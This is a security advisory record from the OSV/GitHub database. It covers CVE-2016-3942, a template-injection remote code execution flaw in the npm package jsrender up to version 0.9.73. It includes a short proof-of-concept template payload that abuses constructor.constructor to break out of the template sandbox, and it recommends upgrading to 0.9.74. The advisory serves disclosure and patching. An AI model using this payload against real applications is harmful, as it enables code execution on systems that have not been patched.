GHSA-r87w-47m8-22w3

Suggest an improvement
Source
https://github.com/advisories/GHSA-r87w-47m8-22w3
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/09/GHSA-r87w-47m8-22w3/GHSA-r87w-47m8-22w3.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-r87w-47m8-22w3
Aliases
  • CVE-2016-3942
Published
2020-09-01T15:24:24Z
Modified
2023-11-08T03:58:27.633161Z
Severity
  • 6.3 (Medium) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L CVSS Calculator
Summary
Template Injection in jsrender
Details

Affected versions of jsrender are susceptible to a remote code execution vulnerability when used with server delivered client-side tempates which dynamically embed user input.

Proof of Concept

//POC-REQUEST
{{for ~x!=1?(constructor.constructor("return arguments.callee.caller")()):~y(10)}}
{{:#data}}
{{/for}}

//POC-RESPONSE
function anonymous(data,view,j,u) { // template var v,t=j._tag,ret="" +t("for",view,this,[ {view:view,tmpl:1, params:{args:['~x!=1?(constructor.constructor(\"return arguments.callee.caller\")()):~y(10)']}, args:[view.hlp("x")!=1?(data.constructor.constructor("return arguments.callee.caller")()):view.hlp("y")(10)], props:{}}]); return ret; }

Recommendation

Update to version 0.9.74 or later.

Database specific 
{
    "github_reviewed": true,
    "github_reviewed_at": "2020-08-31T18:10:44Z",
    "nvd_published_at": null,
    "cwe_ids": [
        "CWE-94"
    ],
    "severity": "MODERATE"
}
References

Affected packages

npm / jsrender

Package

Name
jsrender
View open source insights on deps.dev
Purl
pkg:npm/jsrender

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
0.9.74

Database specific 

{
    "last_known_affected_version_range": "<= 0.9.73"
}